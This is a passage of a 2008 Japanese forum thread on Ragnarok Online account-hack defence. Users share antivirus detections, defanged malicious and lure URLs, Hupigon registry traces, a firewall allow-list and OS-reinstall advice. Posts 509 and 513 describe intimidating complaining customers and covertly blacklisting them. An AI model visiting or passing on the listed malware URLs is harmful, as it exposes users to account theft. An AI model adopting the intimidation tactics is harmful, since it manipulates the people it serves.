479 名前:(○口○*)さん:08/07/25 00:54 ID:867gv/5Z0
セキュリティ情報としては有用だと思うけど。
騒ぎが大きくなれば、他の店舗もそういうのに注意払うようになるんじゃないかな。

480 名前:(○口○*)さん:08/07/25 02:21 ID:FKZlSpIxO
先日の者ですが、とりあえず自由空間の本社に怒鳴りながらクレーム言った。

なんかその場で謝罪され、さらに折り返し上司に連絡させます、言われ
あとでお偉いさんが謝罪してきたから「一発で信用失う真似すんな」と追い打ちかけといた。

481 名前:(○口○*)さん:08/07/25 04:13 ID:NNg0Xtp30
>>480
これで尻に火がついて、少しは良くなるといいがな。

482 名前:(○口○*)さん:08/07/25 04:22 ID:ayC3MulP0
>>480
気持ちはわかるが、怒鳴りながらっていうのはいただけないな

483 名前:(○口○*)さん:08/07/25 05:35 ID:26RoU+Bh0
サポセン業務やってる人間なら怒鳴り散らすの相手するのは日常茶飯事。
電話越しならなおさら怖くない。沸騰してるのを時間かけて冷ませばいいだけだしね。
本当に怖いのはキレたりせずに冷静に理詰めでクレームしてくる客。

ネカフェの本社のサポセンがどの程度の対応するのかは気になるなw
こういうケースは最近増えてきてると思うけど、各社のインシデント事後対応は
どこぞの糞会社を見習わないでほしいね。

484 名前:(○口○*)さん:08/07/25 09:00 ID:v7DRqBjg0
>怖いのはキレたりせずに冷静に理詰めでクレームしてくる客
それはよく分かる。
ただでさえ抜け道が無いし、下手なことを言うと相手の持ち駒が増えるし。

でも、感情ぶつけられるのも苦手な人はいるもんよ。
まーそういうのはだいたい接客向かないんだけれどな。←自分のこと

485 名前:(○口○*)さん:08/07/25 09:08 ID:tHsGoW1m0
>>454と全く同じファイル名のやつ、俺も見つけたな。
ちなみに場所はやっぱり自遊空間。
長野の湖浜店と諏訪インター店の二店舗。
誤検知かと思ってたが違うのね・・・。
来週の頭当たりにまた行こうかと考えてたからそん時またスキャンしてみる・・・。

あ、ちなみにROにログインすんのすっかり忘れてフジリュー版の封神演義見てた '`,、'`,、('∀`) '`,、'`,、

486 名前:(○口○*)さん:08/07/25 09:19 ID:8OgtT/jT0
ヒトが怒る時って身を守る為が多いんだよね。
立場的に弱かったり自分自身の理不尽さを自覚していて、それを誤魔化す為に怒ったりする。
目の前にいたらキレて手が出るかもしれないから怖いけど、電話越しなら別に怖くはない。

487 名前:475:08/07/25 09:46 ID:Mjifaf6FO
俺が行ったのも自遊空間だな
先月は何も無かったんだが…

これから行くんだけど、オンラインスキャンでカスペル以外におすすめってある?

488 名前:(○口○*)さん:08/07/25 10:04 ID:v7DRqBjg0
オススメ聞くようじゃダメなんじゃないかな。
確からしい答えは聞き出せても、それは確かな答えではないよ。

たまに貼られているVTのリンクで、どこの対応が良いか見ておくとか。

489 名前:(○口○*)さん:08/07/25 11:29 ID:ayC3MulP0
怖い怖くないっていうより、表面上は謝って受け流されるのが多いって事
会社によってはクレーマー登録するところもあるし

今後に生かす生かさないかは会社次第でもあるけど

490 名前:488:08/07/25 11:44 ID:v7DRqBjg0
これだけじゃなんなので。
特定のネトゲだけなら接続先がかなり限定されるので、
何らかの方法でそこ以外にセッションを張れないようにすればいい。

再起動で初期化されるネカフェPCで使えるいいソフトあるかな?

491 名前:(○口○*)さん:08/07/25 12:07 ID:HcfJcqis0
そういう制御するためには結構下のレイヤに干渉しないといけないわけで。
ネカフェのPCでそういうレイヤをいじるための権限が付与されてたら、そういう制御を
ユーザができるとしたら、それだけで既に何でも仕込めるし再起動時の再初期かも回避可能な
状態であり、危険が危なくて(日本語としては間違ってるが)、ユーザ側で対策するとか以前の
状態だと思うぜ。

492 名前:(○口○*)さん:08/07/25 12:15 ID:v7DRqBjg0
んーまあ確かにそれもそうだ。
せめてプログラム単位で通信を抑制できればいいんだけれど、
うまい方法ないもんだね。

493 名前:475:08/07/25 12:44 ID:WkyBT0mr0
ネカフェのPCのカスペルスキーオンラインスキャン終了

感染オブジェクト名 ウイルス名 前回の処理
C:\WINDOWS\system32\tevynhe.xlf 感染: Backdoor.Win32.Rbot.rdx スキップ

C:\WINDOWS\system32\tevzipp.xlf 感染: Backdoor.Win32.Rbot.rdx スキップ

という結果が出てきました。

ついでにAVGをおとしてかけてみたら上記の物はみつからず
代わりに

"C:\Program Files\NCSoft\Lineage II\system\l2.exe";"トロイの木馬Generic_c.SXT"

というものがかかりました。
こっちは誤検出か?

とりあえず店員に伝えてから帰ります。
夜勤明けなのでそろそろ眠気が・・・

494 名前:475:08/07/25 13:35 ID:WkyBT0mr0
連レスごめん

今店員に見てもらった

どうやら店で使ってる自動復元のソフトがひっかっかてるんじゃないか?とのことで
確認にいってる。

待ち始めてそこそこ時間がたったけど結果が気になる・・・
どうしようかなぁ

495 名前:(○口○*)さん:08/07/25 13:37 ID:cZyn4M/I0
nProだろうね。しかし本物のウイルスを見逃してどうする…。

496 名前:(○口○*)さん:08/07/25 13:39 ID:YILLyPLF0
諦めたらそこで試合終了ですよ
俺なら帰るけど
とりあえずメ欄のsageは小文字でないとダメだ

497 名前:(○口○*)さん:08/07/25 13:44 ID:HcfJcqis0
「諦めたら?そこで試合終了ですよ?」
って言われたことならある。

498 名前:(○口○*)さん:08/07/25 14:12 ID:v7DRqBjg0
もうやめて!>>494のHPは0よ

499 名前:(○口○*)さん:08/07/25 15:46 ID:QbCn0YGZ0
avast!がROのファイル
rdefk.dfdに反応するので
カスペルスキーオンラインスキャンをかけてみたら
こっちは無反応だった

またavast!の誤認なのかなぁ…

500 名前:475:08/07/25 15:51 ID:WkyBT0mr0
結果がわかった
リカバリーソフトが原因っぽいけど
作成した会社と確認がとれないとれないとのこと

ほんとにバックドアである可能性があるので店内のPCからは削除するらしいです。

本社を介して他の店舗も削除作業をするんじゃないかな?

結果を待ってる間の分はただになりましたw

以上報告終わり。

501 名前:(○口○*)さん:08/07/25 15:51 ID:v7DRqBjg0
avast誤爆多いよね
誤認識は、信頼性という意味ではすり抜けよりもたちが悪い。

ウイルス検出されて駆除したらアプリが壊れていた、とかね。

502 名前:(○口○*)さん:08/07/25 16:01 ID:QbCn0YGZ0
>501
もうavastの誤認には散々煮え湯のまされてる。
そのくせ肝心のウィルスをスルーするからたまらない
カペルスキー製品版の導入を検討してる昨今。

503 名前:475:08/07/25 16:50 ID:Mjifaf6FO
>>496
あり?
どうりでスレがあがってるはずだorz

しかし、系列店の複数の店舗に同じようなのが仕掛けられたってことは
リカバリーソフトにあらかじめ仕掛けてあったってことか?

感染してるファイルの名称や数が異なっていたり、感染してないPCがある。とも言ってたんだよなぁ。

とりあえずパスワード変更してきます

504 名前:(○口○*)さん:08/07/25 16:51 ID:v7DRqBjg0
最悪の場合、設置やメンテを行う業者が(またはその従業員が)仕込むって
事もあり得るよなぁ・・・。

505 名前:(○口○*)さん:08/07/25 17:01 ID:G7+DL06H0
導入業者がきっちりした作業手順を確立していなかったり、手抜きをしたのではなかろうか。
本来なら、更のマスタイメージに必要なアプリを追加して、それを複数台に展開するのが理想だが、単に運用中の環境に
復元ソフトを導入しただけで済ませた結果、マルウェア込みの環境のまま運用されてしまったとか。

506 名前:(○口○*)さん:08/07/25 17:07 ID:7r3/XTIo0
【      気付いた日時          】さきほど
【不審なアドレスのクリックの有無 】http://www■soultaker■biz/valhalla/
【他人にID/Passを教えた事の有無】なし
【他人が貴方のPCを使う可能性の有無】なし
【    ツールの使用の有無      】なし
【  ネットカフェの利用の有無    】なし
【     OS    】XP
【使用ブラウザ 】Firefox
【WindowsUpdateの有無】なし
【 アンチウイルスソフト 】バカフィー
【その他のSecurty対策 】なし
【 ウイルススキャン結果】カスペルスキー・Ad-Aware検出なし。マカフィーは現在スキャン中
【スレログやテンプレを読んだか】今から
【hosts変更】なし
【PeerGuardian2導入】なし
【説明】wikiを見ていて不注意で踏んでしまいました
ポップアップがブロックされましたって出た段階で閉じました
検出はされなかったんですけど怪しさ満点だったので・・・

507 名前:(○口○*)さん:08/07/25 17:14 ID:7r3/XTIo0
あ、ウィンドウズアップデートはやってます間違いました

508 名前:(○口○*)さん:08/07/25 20:07 ID:867gv/5Z0
このスレ見てると、オンラインスキャンで検出されないネカフェのほうが少ない気がしてくるわ

509 名前:(○口○*)さん:08/07/25 21:34 ID:BkjOq7+B0
>>480みたいな口先だけの謝罪対応で引っ込む馬鹿は楽でいいな
電話の向こうじゃニヤニヤしながら鼻毛抜いてるってのに

お偉いさんじゃなくて迷惑クレーマー対応部署に回されただけ
折り返し電話かける、ってのはブラックリストに名前入れるための口実
こんなこともわからないのばっかだとクレーム対応も楽でいいのに


理詰めで文句言ってると勘違いしてる阿呆はちょっと脅せばすぐひっこむ
どうとでも取れる言葉で威力営業妨害で訴えるよ、って臭わせれば一発
クレーマーなんて店に取っては百害あって一利なし
来なくなってくれれば最高

こういうとこに書き込んだら訴えるって取れる言葉を上手く織り交ぜるのがコツだね
一部上場企業のお客様相談(クレーマー対応)なんかはここらへんほんと上手くやる

510 名前:(○口○*)さん:08/07/25 21:35 ID:/JNsNOt70
スレ違い

511 名前:(○口○*)さん:08/07/25 21:38 ID:z5+OwArw0
どうせネット弁慶だろ

512 名前:(○口○*)さん:08/07/25 21:39 ID:m9NDqfc80
言うまでもありません

513 名前:(○口○*)さん:08/07/25 21:44 ID:m+frZ5HK0
>折り返し電話かける、ってのはブラックリストに名前入れるための口実

これ知らないやつ多いね
ぽんぽん個人情報差し出して来るから笑える

ご利用になったと時間帯をお教え願えますか
折り返し店長からお電話させていただきますので、お客様のお名前とお電話番号をお願い致します

これで要注意の客リストに載せて終了
次からご入店の際には全店舗で名前が赤にて表示されます

514 名前:(○口○*)さん:08/07/25 21:46 ID:/JNsNOt70
http://enif.mmobbs.com/test/read.cgi/livero/1216046992/
ネカフェスレもう無いのかと思ったらまだあるじゃんか
関係ないネタはそっちでやってくれよ

515 名前:(○口○*)さん:08/07/25 21:46 ID:KJx+0/Fg0
クレーマー認定するようなネカフェだと、自分でバックドアとか仕込むことも考えられるね。
客が何してるか監視する名目でさ。
それでパスワードとか拾えたら、業者に売り込んで一儲け。

怖いね。

516 名前:(○口○*)さん:08/07/25 21:47 ID:NNg0Xtp30
つまらん奴が偉そうな顔してやってくる

517 名前:(○口○*)さん:08/07/25 23:20 ID:GsF4O/qv0
スレが伸びてると思ったら、スレを機能停止に追いやりたい
中華が大量に沸いてたのか

518 名前:(○口○*)さん:08/07/26 00:16 ID:0yzmNGGf0
>>499
>>500
>>501
2週間ぶりに家に帰ってきてRoやる前にスキャンと思って
avastかけたら"rdefk.dfd"にトロイ検出されて戦々恐々してたら…
誤爆なのかナァやっぱり…
心臓に悪いから勘弁して欲しいよ…

519 名前:(○口○*)さん:08/07/26 02:07 ID:3f9fqkhB0
>>518
もともとnProが使ってる手段にはウィルスで使われるものが
多分に含まれてるから、そこを責めるのは筋違いだよ。

520 名前:(○口○*)さん:08/07/26 04:43 ID:3tty5RgI0
nPro と Jword をマルウェア認定しないアンチウィルスには、どこか利権の臭いがします。

521 名前:(○口○*)さん:08/07/26 05:47 ID:LoGTV/yR0
>>520
あなたが大人なら、それをやると次に何が起こるか想像しましょう。

522 名前:(○口○*)さん:08/07/26 11:48 ID:DEQHP1b50
ソフトウェア発行者の身元とソフトウェアの目的がはっきりされているものまで弾くのは間違いだわな。
nProもJwordも普通のユーザーなら導入されることを知れるわけだし。
確かに利権には違いないが、普通にネット社会の仕組みに組み込まれるべきことだろ。

523 名前:(○口○*)さん:08/07/26 12:13 ID:3f9fqkhB0
>>522
問題は、nProはしょっちゅう更新されるということだ。
パターンファイルで例外判定すればいいところだけど
パターン更新が追いついてないときに危険判定下すというのは
未知のウィルスへの防御が有効に働いているということ。

524 名前:(○口○*)さん:08/07/26 14:54 ID:xYpy5K5P0
JWordと垢ハックとの関連をkwsk

525 名前:(○口○*)さん:08/07/26 14:57 ID:olD0IAdF0
>>522
nProはインストール時に、導入される事を一切報告しない。
アドウェアはnProとはジャンルが異なるが、インストールすることの許可を求める。

526 名前:(○口○*)さん:08/07/26 16:24 ID:h8HAmUw40
カスペはマスターオブエピックとか入ってるPCでも誤検出するな。
cgMoEDrv.dllだっけか。俺が働いてる店でもこれでクレーム受けた。

527 名前:(○口○*)さん:08/07/26 16:29 ID:K7iRW1b90
それは以前あった症状でしょ
いまは誤検出していない

528 名前:(○口○*)さん:08/07/26 23:16 ID:8P8+T6xR0
さっき情報漁ってたら下記サイトで検索文画面と全く違うサイトが…
www.ro-fivestars.org/archives/game/mmorpg/ro

マカフィーで安全となっていたので油断してましたが
もしかして引っかかってしまったのでしょうか?

529 名前:(○口○*)さん:08/07/26 23:21 ID:olD0IAdF0
>>528
ドメイン失効

530 名前:528:08/07/26 23:25 ID:8P8+T6xR0
>>529
ありがとうございます!
ということは、安心しておkということですかね?
今後は慎重に踏みます…

531 名前:(○口○*)さん:08/07/26 23:47 ID:waWaoDTA0
ついでにテンプレ守っとけ

532 名前:(○口○*)さん:08/07/28 00:38 ID:lXf/1xll0
【      気付いた日時          】先ほど
【不審なアドレスのクリックの有無 】 記憶になし
【他人にID/Passを教えた事の有無】 No
【他人が貴方のPCを使う可能性の有無】 No
【    ツールの使用の有無      】 No
【  ネットカフェの利用の有無    】 Yes(最後に使ったのは5月)
【     OS    】 WindowsXP Professional SP3
【使用ブラウザ 】 Opera9.5
【WindowsUpdateの有無】 毎月更新済み
【 アンチウイルスソフト 】 avast!
【その他のSecurty対策 】 Spybot,Ad-Aware
【 ウイルススキャン結果】 カスペルスキーで無Hit
【スレログやテンプレを読んだか】 Yes
【hosts変更】 有、一月ほど前に更新したきり
【PeerGuardian2導入】 有
【説明】
2週間ほど前から220■73■222■254:80にアクセスしようとしてるのをPG2が遮断してるのに気付きました。
引っかかってるのはPG2の韓国リストみたいなんですが、
それ以上わからなかったので詳しい方に教えていただきたい次第です。

533 名前:(○口○*)さん:08/07/28 00:46 ID:hBykrbFx0
684 名前:既にその名前は使われています[] 投稿日:2008/05/18(日) 23:39:09.74 ID:sQ+opesg
220.73.222.254はニコニコみてるとアクセスしに行くんだけど、他の人も行くのかね?
ちなみにtubeplayerつこうてる
ブラウザでは一切見ない

685 名前:既にその名前は使われています[sage] 投稿日:2008/05/18(日) 23:43:24.53 ID:SK+ML50Y
>>684
ニコニコのアフィリエイトの画像はほとんどあっちの鯖のやつだから


ただブロックしてるってだけで気になるならPG2をもっとよく理解するべきだと思う
IPだって物によっては調べればすぐ出てくるわけだし

534 名前:(○口○*)さん:08/07/28 00:49 ID:Q+m0rpZB0
http://sky.geocities.jp/vs_ro_hack/ro_allow.txt

RAGNAROK-JP:61.215.212.0-61.215.212.255
RAGNAROK-JP2:61.215.214.128-61.215.214.255
WEB-SYSTEM:61.215.220.64-61.215.220.255
RAGNAROK-JP2:211.13.228.0-211.13.228.255
GUNGHO-MODE:211.13.229.0-211.13.229.255
RAGNAROK-JP3:211.13.232.0-211.13.232.255
RAGNAROK-JP4:211.13.235.0-211.13.235.255
GUNGHO-PAT1:219.123.155.160-219.123.155.191
GUNGHO-PAT1:221.247.195.160-221.247.195.191
GUNGHO-PAT3:125.101.19.64-125.101.19.95
GUNGHO-PAT4:124.32.117.192-124.32.117.22

これに、下記を追記(スクルド鯖で使用)

GET-AMPED:61.215.222.0-61.215.222.128

535 名前:(○口○*)さん:08/07/28 01:22 ID:lXf/1xll0
>>533
なるほど、アファリ画像でしたか。ニコニコ見てない時間にもかなり多く弾いてたので(port2000~4000番台で続けて)
何か他のが取りに行ってるのかな?
ひとまず安心なようで、ありがとうございました。勉強してきます。

536 名前:(○口○*)さん:08/07/28 08:52 ID:Q8ouqaF+0
2ch専用ブラウザでjpgなどの画像のリンク先を直接開かなくてもある程度わかるように小さい画像で表示するものを使っているのですが
それが原因で感染する可能性ってありますでしょうか?

537 名前:(○口○*)さん:08/07/28 10:32 ID:b8kP8qDq0
↑で話題に出た自遊空間のtev〜.xlfファイルですが
系列で使っているリカバリソフトをインストール時に作成されるファイルで
何も問題はないとのこと
以上参考までに

538 名前:(○口○*)さん:08/07/28 12:20 ID:MiEgvLAk0
RealPlayerに深刻な脆弱性、アップデートで対処
ttp://www.itmedia.co.jp/news/articles/0807/28/news009.html

539 名前:(○口○*)さん:08/07/28 20:11 ID:KPaGk1sU0
以前、ここで垢ハックされたときの相談をさせていただいた者です。
始まりの4/15日から、7/28日現在、補填をしてもらえることが決定しました。
復旧まで、1〜2週間かかるみたいですが、何とか解決しました。このスレの
皆さんにはお世話になりました。ありがとうございます。

でも、補填って一人一回だけなんですね・・・ 不正アクセスによる
復旧は一度限りと書いてありました・・次かかったらどうしよ・・・

540 名前:まとめ臨時 ◆kJfhJwdLoM:08/07/28 20:14 ID:hVn+JLGp0
>>534
こちらでも追加しました。
http://sky.geocities.jp/ro_hp_add/ro_tai01.html#PG2RO

541 名前:(○口○*)さん:08/07/28 20:57 ID:Q+m0rpZB0
>>539
お疲れ様でした。セキュリティソフトの導入と定期的なパターンの更新の他に、PG2等の予防策も
講じておくといいと思いますよ。

可能でしたら、経過報告や、警察で聞かれたこと、持っていったもの、最終的な対応などを書いて
頂けないでしょうか。今後の参考になると思います。

542 名前:539:08/07/28 21:08 ID:KPaGk1sU0
被害にあった翌日に警察署に→そこでキャラ名・所属鯖などその他もろもろを
担当の方に教える。それから、しばらく、音沙汰なし それから、呼び出されて
調書をとり、ラグナロクに接続したIPのログなどを見せられる。この時点で
不正アクセスと立証できるが、捜査は終了していないので、まだ補填は不可

その後、中国からの接続と判明 捜査を断念 ガンホーが不正アクセスと判明しても
アイテムを返してくれるか不安だというと、担当の方がガンホーに確かめてくれたり
しっかりした対応をしてくれたと思います。ただ、数週間に一度は電話で進展あった
か、聞いたほうが早いと感じました。

543 名前:(○口○*)さん:08/07/28 23:02 ID:71/6Cq1K0
>>536
原理的にはおそらく安全・・・なんだけどこれに限らず全てにおいて
可能性がないなんてことはありえない。
たとえばJPEG画像展開部分にセキュリティホールがあって
そこを突くjpgを読み込んでしまったらアウト。

だから安全を期したいのなら、余計なデータには触らないに限るよ。

544 名前:(○口○*)さん:08/07/29 05:52 ID:zRwPo768O
>>499
なんか検索したら無害そうだったんで
放置してます

545 名前:(○口○*)さん:08/07/29 09:23 ID:P/ysPlz60
>>543
なるほど、一応原理的には安全なんですか。
しかし用心することに越したことはなさそうですね。
データが復旧されたら、念のため2chブラウザも変えてみようと思います。

546 名前:(○口○*)さん:08/07/29 11:17 ID:jZQ7ASam0
>>538で指摘されている脆弱性を狙ってきたか、>>417の転送先が入れ代わっていた。
-> www■coconlovely■com/Blog/
--> www■coconlovely■com/Blog/06014■htm
--> www■coconlovely■com/Blog/0733■htm
--> www■coconlovely■com/Blog/realplay■htm
--> www■coconlovely■com/Blog/flash■htm
www■coconlovely■com/Blog/huohu5798592■swf

……ああ面倒。

547 名前:(○口○*)さん:08/07/29 11:31 ID:UWPE5fph0
アカウントハック仕込みがだいぶ組織化してきたな。
ワンクリックで何でもできてしまう利便性が、逆にゼロデイ攻撃に利用される。

548 名前:(○口○*)さん:08/07/29 16:55 ID:5o8B4jWH0
近頃また増えてきたよなあ

549 名前:L ★:08/07/30 01:17 ID:???0
50 名前:(^ー^*)ノ〜さん[sage] 投稿日:08/07/30(水) 00:48 ID:ni9Ujz/H0
会員制の掲示板立ち上げました!

攻略系の内容はさすがに全てが全て書き込めるわけではないので ...

http://◆www◆livedoorm◆com◆blog.htm

----
ofsfb-18p2-25*.ppp11.odn.ad.jp

550 名前:(○口○*)さん:08/07/30 01:20 ID:169Tk0wr0
(゚д゚)

551 名前:(○口○*)さん:08/07/30 01:26 ID:BYFgsSxU0
全く同じ物がアプリコットにも貼られていたな

552 名前:(○口○*)さん:08/07/30 01:38 ID:WFIWLotK0
最近多いねlivedoorm。あとyouturebe。

553 名前:(○口○*)さん:08/07/30 11:59 ID:NY+eMJuJ0
シマンテック、「ノートン2009」日本語ベータ版を無償公開
http://internet.watch.impress.co.jp/cda/news/2008/07/18/20308.html

話題になっていなかった気がするので一応。
2009はオンラインゲームを考慮したものになるとかいう話なので(↓)、
テスト環境のある方は自己責任でおためしあれ〜。

2009年版は「パフォーマンスに影響が出ないソフト」に。セキュリティソフト大手
シマンテック,ゲームにフィーチャーしたセミナー開催
http://www.4gamer.net/games/001/G000183/20080604036/

554 名前:(○口○*)さん:08/07/30 15:26 ID:FOkV0Q+T0
すみません、質問させてください。
5日前のウイルスバスターの検索で、下のものがひっかかりました。トロイの木馬系のウイルスのようです。
karnaeghdrv.dll
TROJ_GAMETHIEF.M

隔離されているファイルを削除したのですが、今日の検索でもまったく同じものがひっかかりました。
とくに妖しいURLを踏んだりした自覚はないのですが、どこかで気づかずに踏んでしまっているようです。
最近はRO関連サイトしか覗いてないのですが、これはアカウント関連のウイルスなんでしょうか?
分かる方がいましたら教えてください。

555 名前:(○口○*)さん:08/07/30 16:36 ID:ftWHSFm10
バスターでひっかからないダウンローダが残ってるとかかもね。
複数のエンジンで(オンラインスキャンの活用で)検索する事をお勧めする。

アカハック関連というか、hostsファイル削除とかやってるようですし、RO単体が標的かどうかは
わかりませんが、(ROのアカハックトロイを含む)他の危険物を呼び込む可能性があります。
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=TROJ%5FGAMETHIEF%2EM&VSect=Sn

karnaeghdrv.dll自体は、リネージュのアカハックとか幾つかで用いられているようですので、
アカハックかと思われます。手動でファイルを削除する場合はセーフモードにする必要があるようです。

可能な限り、OSの再インストールコースで、確実に安全な環境を再構築すること。

556 名前:554:08/07/30 17:38 ID:1G3J1ihrO
554です。一時ネット回線を切ったので携帯から失礼します。
>>555
丁寧にありがとうございます。
削除の際に、セーフモードにせずその場ですぐに消してしまったので、上手く削除できなかったのかもしれません。
セーフモードの状態でもう一度やってみます。

念のため、OSの再インストールも行いたいのですが、行う際に注意することってあるでしょうか?
例えばパソコンのデータが消えるからバックアップが必要とか。

再インストールの手順は検索した情報でどうにかなりそうなのですが、パソコンの知識に疎くOSのインストールが何を意味するのか分らなくて・・・orz
家で共用のパソコンなので、万が一にもパソコンが使えなくなったりする様な事態は困るのですが。

それとも、こんなあやふやな状態でやるくらいなら、OSの再インストールはしない方が良いでしょうか?

質問ばかりですみません。

557 名前:(○口○*)さん:08/07/30 19:14 ID:ftWHSFm10
>>556
>例えばパソコンのデータが消えるからバックアップが必要とか。
その通り。インストールの方法によっては消える可能性もありますので、データのバックアップをお忘れなく。
(置き場所やOS入れ直しの方法によってはデータが消えないものもあります。どこが消えるのかわからなければ
必要なデータはすべてバックアップを)

あとは、アプリケーションも(フォルダに残っていても、殆どの場合、起動しなくなっていますので)、すべて入れ直しに
なりますので、再インストール時は、アプリケーションのインストール用ディスク一式も用意しておきましょう。
各種ソフトのシリアルナンバーや、セキュリティソフトの認証IDとパスワード、メールソフトの設定などもすべて
やりなおしですので、必要なら事前にメモをとっておきましょう。ネットワーク接続の設定が必要な場合、
ISPの契約書類を発掘するか、自分で接続設定を控えておくと良いでしょう。

OS入れ直しの際に、プロダクトIDを入れないといけませんが、それが書いてある紙をなくしてしまった場合などは
PCが生きている間に(ツールなどを使用して)プロダクトIDを確認することが必要になるかもしれません。

OSを再インストールすれば、安全な環境になりますが、ウィルス等の悪意のあるソフトウエアの本体や
ダウンローダなどがHDD内に残っていると、事故で発動させてしまって(発動させるまでは安全な環境です)
元の木阿弥というケースもあります。

趣味で保存しておいたり、アカハックの証拠として保全しようという奇特な人でもない限りは
セキュリティソフトですべて削除してから行なうのが望ましいです。(HDDのフォーマットからやれば安心)
メーカー製PCのリカバリの場合、PC購入時の状態になる為、確実にデータも消えますのでご注意ください。

>家で共用のパソコンなので、万が一にもパソコンが使えなくなったりする様な事態は困るのですが。
…えー、再インストールに失敗した場合、PC起動しなくなりますので、OSの入れ直しを改めて行なう必要があります。

>それとも、こんなあやふやな状態でやるくらいなら、OSの再インストールはしない方が良いでしょうか?
いいえ、やっちゃいましょう。PCを飛ばして(動かなくして)、復旧させることで、PCに関するスキルはアップします。
飛ばして覚えるMS-DOS…じゃないですが、そーゆーもんです。

再インストール前に、OSのSP適用済みディスクを作っておくと便利です。「SP+メーカー」を使ってみてください。
M/Bやビデオカードなどのドライバー類、(Intel製のM/Bなら)IAAなど、インストール時に必要になるデータも
一通り揃えて、CD-Rなどにまとめておきましょう。

細かい事はいろいろありますが、あとはやってみて覚えましょう。

家族と共用ということでしたら、家族のバックアップが必要なデータについても、きちんと確認しておきましょう。
うっかり消しちゃわないように。

558 名前:(○口○*)さん:08/07/30 19:17 ID:W9DIuhiS0
557はきっとB型だな。親切心と同時に執念を感じるぜw

559 名前:(○口○*)さん:08/07/30 19:19 ID:ftWHSFm10
ごめん、A型なんだwww

560 名前:(○口○*)さん:08/07/30 19:36 ID:Xk6kQloI0
血液型と性格に相関性がないからな。
「紫色の服着てる女は欲求不満」と言ってるのと大差ない。

561 名前:(○口○*)さん:08/07/30 23:36 ID:YRoyu8ZG0
>>554
怪しいサイトにいかない、自覚がないっていう人に限って
P2P、フリーソフト、アップローダーからダウソしまくりだからなぁw

562 名前:(○口○*)さん:08/07/31 05:48 ID:QzluSOT30
ウイルス感染以外の理由でも、OSから再インストールが必要になる場合は少なくないから、日頃から必要なデータは
ちゃんとバックアップを取っておいた方がいいよ。
特にこの時期、落雷に絡んだクラッシュは多いし。

563 名前:(○口○*)さん:08/07/31 09:49 ID:OlHzPGzc0
仮想ブラウザでWebからの脅威を防ぐ「ZoneAlarm ForceField」
http://internet.watch.impress.co.jp/cda/news/2008/07/30/20431.html

対応OSはWindows Vista/XP、対応WebブラウザはInternet Explorer 7/6
およびFirefox 3/2/1。価格は3980円。 8月21日に発売。

564 名前:(○口○*)さん:08/07/31 10:31 ID:pTQP+INY0
>>563
この仮想ブラウザ機能ってブラウザ側で標準設定されててもよさそうなものだが
そしたらウイルスに狙われるだけか。

まぁ仮想ブラウザ用ウイルスも作成されるんだろうな。
そして仮想ブラウザ用ウイルスを検出・削除するソフトが出来て
仮想ブラウザを仮想するブラウザが…

565 名前:(○口○*)さん:08/07/31 11:53 ID:OlHzPGzc0
DNSの脆弱性問題でISPに被害
米AT&TのISPが運営するDNSキャッシュサーバが攻撃を受け、Googleへの
トラフィックが別のサイトに誘導された。
http://www.itmedia.co.jp/news/articles/0807/31/news021.html

いよいよ笑えなくなってきた。

566 名前:(○口○*)さん:08/07/31 23:45 ID:geBML8tD0
 ROとは関係ないかもしれませんが、質問させてください。

【      気付いた日時          】 2008/07/31 22時頃
【不審なアドレスのクリックの有無 】 無し(ROアカハック対策スレまとめサイトhost追加分・リネージュ資料室・BS Wiki・Googleトップ程度しか開いておりません)
【他人にID/Passを教えた事の有無】 NO
【他人が貴方のPCを使う可能性の有無】 NO
【    ツールの使用の有無      】 NO
【  ネットカフェの利用の有無    】  NO
【     OS    】 Windows XP Home Edition Version2002 Srevice Pack 3
【使用ブラウザ 】 Firefox 2.0.0.16
【WindowsUpdateの有無】 7月半ばのアップデートが最後だと思います。
【 アンチウイルスソフト 】 カスペルスキーインターネットセキュリティ 6.0.2.614(Ver.7.0も使っていたのですが、ROがかなり重くなる為6.0に戻して使っています。)
【その他のSecurty対策 】 BitDefenderコマンドライン版・Spybot S&D・ルータ・PG2
【 ウイルススキャン結果】 Spybotにて『Hupigon13』検出 以下ログ貼り付け

Hupigon13: [SBI $B4B2695A] 設定 (レジストリ値, nothing done)
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\sr\ImagePath=...\SystemRoot\...

Hupigon13: [SBI $2DB066C7] 設定 (レジストリ値, nothing done)
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet003\Services\sr\ImagePath=...\SystemRoot\...

【スレログやテンプレを読んだか】 Yes
【hosts変更】有/手動書き換え 2008/07/31 21時頃(ROアカウントハック対策スレのまとめサイトhost追加分・リネージュ資料室・BS Wikiを参考にしております。)
【PeerGuardian2導入】 有(ROアカウントハック対策スレのまとめサイト・リネージュ資料室・BS Wiki のリストを使用しております。)
【説明】
 「もしかして誤検出じゃ?」と思えるところもあるので質問させていただきました。
 ほぼRO専用にしているPCなので、上記のサイト程度しか普段から見ていないPCなのですが(攻略サイト等の情報は別PCで見ています)、
 ひさしぶりにPCを起動(7/28から家を空けていた為。一人暮らしなので、その間に別の誰かが使用する事も無いと思います。)したので、
 各種ソフトでスキャンをかけてみたところ、Spybotで『Hupigon13』を検出しました。
 その後、カスペルスキーでフルスキャンをしてみたのですが、何もみつかりませんでした。
 7/28にも上記のセキュリティ対策ソフト各種でスキャンをしていたのですが、何も見つかっていません。

 本日、PCを起動してから行ったのが、
1・各種ソフトの定義ファイルアップデート
2・Host書き換えの為、上記3サイトでリスト集め
3・ROを起動してパッチサーバーに繋ぐ
4・BitDefender→SpyBot(ここで検出。検出画面のまま放置。)→カスペルスキー の順でスキャン
 この程度だったので、怪しいリンクを踏んだとも思えないのですが…

 これに関して何かわかる方がいらっしゃいましたら、宜しくお願いします。

567 名前:566:08/07/31 23:48 ID:geBML8tD0
追記で申し訳ないのですが、PG2でのブロックの形跡は何もありませんでした。

568 名前:(○口○*)さん:08/08/01 00:20 ID:t1OGaIxN0
Spybotで発見後、削除したんじゃないの?

569 名前:(○口○*)さん:08/08/01 00:24 ID:t1OGaIxN0
ごめん、よく見てなかった。削除しないで、検出後放置か…。

参考までに
http://questionbox.jp.msn.com/qa4069654.html?StatusCheck=ON
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=BKDR%5FHUPIGON%2EOHB&VSect=T

レジストリから「Debugger = "ntsd -d"」を検索して削除していくといいかもしれない。
セキュリティソフトの抑止を行なう模様。

570 名前:(○口○*)さん:08/08/01 00:26 ID:t1OGaIxN0
dat落ちしてるようなので、ここの924以降参照。「ntsd -d」で入ってても正常なものもあるので注意。

